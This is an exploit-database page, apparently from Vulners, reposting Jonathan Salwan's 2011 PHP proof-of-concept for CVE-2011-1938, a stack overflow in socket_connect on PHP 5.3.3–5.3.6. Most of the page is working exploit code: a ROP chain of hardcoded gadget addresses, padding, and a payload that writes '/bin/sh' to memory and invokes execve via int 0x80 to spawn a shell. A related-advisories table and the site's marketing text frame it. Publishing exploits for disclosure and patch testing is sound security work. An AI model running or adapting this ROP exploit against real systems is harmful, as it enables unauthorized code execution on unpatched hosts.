Vulners
Lucene search
PHP 5.3.6 Buffer Overflow
🗓️ 03 Jul 2011 00:00:00Reported by Jonathan SalwanType 
packetstorm🔗 packetstormsecurity.com👁 87 Views
| Reporter | Title | Published | Views | Family All 126 |
|---|---|---|---|---|
 | php -- multiple vulnerabilities | 18 Aug 201100:00 | – | freebsd |
 | PHP <= 5.3.5 socket_connect() Buffer Overflow Vulnerability | 25 May 201100:00 | – | zdt |
| PHP 5.3.6 Buffer Overflow PoC (ROP) CVE-2011-1938 | 4 Jul 201100:00 | – | zdt |
 | PHP 5.3.x < 5.3.7 Multiple Vulnerabilities | 23 Aug 201100:00 | – | nessus |
| Mac OS X 10.7 < 10.7.3 Multiple Vulnerabilities | 6 Feb 201200:00 | – | nessus |
| PHP 5.3 < 5.3.7 Multiple Vulnerabilities | 23 Aug 201100:00 | – | nessus |
| Amazon Linux AMI : php (ALAS-2011-07) | 4 Sep 201300:00 | – | nessus |
| Amazon Linux AMI : php (ALAS-2011-7) | 12 Oct 201400:00 | – | nessus |
| CentOS 5 : php53 (CESA-2011:1423) | 3 Nov 201100:00 | – | nessus |
| Debian DSA-2399-2 : php5 - several vulnerabilities | 1 Feb 201200:00 | – | nessus |
10
`<?php
/*
** Jonathan Salwan - @shell_storm
** http://shell-storm.org
** 2011-06-04
**
** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1938
**
** Stack-based buffer overflow in the socket_connect function in ext/sockets/sockets.c
** in PHP 5.3.3 through 5.3.6 might allow context-dependent attackers to execute arbitrary
** code via a long pathname for a UNIX socket.
*/
echo "[+] PHP 5.3.6 Buffer Overflow PoC (ROP)\n";
echo "[+] CVE-2011-1938\n\n";
# Gadgets in /usr/bin/php
define('DUMMY', "\x42\x42\x42\x42"); // padding
define('STACK', "\x20\xba\x74\x08"); // .data 0x46a0 0x874ba20
define('STACK4', "\x24\xba\x74\x08"); // STACK + 4
define('STACK8', "\x28\xba\x74\x08"); // STACK + 8
define('STACK12', "\x3c\xba\x74\x08"); // STACK + 12
define('INT_80', "\x27\xb6\x07\x08"); // 0x0807b627: int $0x80
define('INC_EAX', "\x66\x50\x0f\x08"); // 0x080f5066: inc %eax | ret
define('XOR_EAX', "\x60\xb4\x09\x08"); // 0x0809b460: xor %eax,%eax | ret
define('MOV_A_D', "\x84\x3e\x12\x08"); // 0x08123e84: mov %eax,(%edx) | ret
define('POP_EBP', "\xc7\x48\x06\x08"); // 0x080648c7: pop %ebp | ret
define('MOV_B_A', "\x18\x45\x06\x08"); // 0x08064518: mov %ebp,%eax | pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('MOV_DI_DX', "\x20\x26\x07\x08"); // 0x08072620: mov %edi,%edx | pop %esi | pop %edi | pop %ebp | ret
define('POP_EDI', "\x23\x26\x07\x08"); // 0x08072623: pop %edi | pop %ebp | ret
define('POP_EBX', "\x0f\x4d\x21\x08"); // 0x08214d0f: pop %ebx | pop %esi | pop %edi | pop %ebp | ret
define('XOR_ECX', "\xe3\x3b\x1f\x08"); // 0x081f3be3: xor %ecx,%ecx | pop %ebx | mov %ecx,%eax | pop %esi | pop %edi | pop %ebp | ret
$padd = str_repeat("A", 196);
$payload = POP_EDI. // pop %edi
STACK. // 0x874ba20
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"//bi". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK4. // 0x874ba24
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
"n/sh". // pop %ebp
MOV_B_A. // mov %ebp,%eax
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
MOV_A_D. // mov %eax,(%edx)
POP_EDI. // pop %edi
STACK8. // 0x874ba28
DUMMY. // pop %ebp
MOV_DI_DX. // mov %edi,%edx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
MOV_A_D. // mov %eax,(%edx)
XOR_ECX. // xor %ecx,%ecx
DUMMY. // pop %ebx
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
POP_EBX. // pop %ebx
STACK. // 0x874ba20
DUMMY. // pop %esi
DUMMY. // pop %edi
DUMMY. // pop %ebp
XOR_EAX. // xor %eax,%eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INC_EAX. // inc %eax
INT_80; // int $0x80
$evil = $padd.$payload;
$fd = socket_create(AF_UNIX, SOCK_STREAM, 1);
$ret = socket_connect($fd, $evil);
?>
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jul 2011 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.36532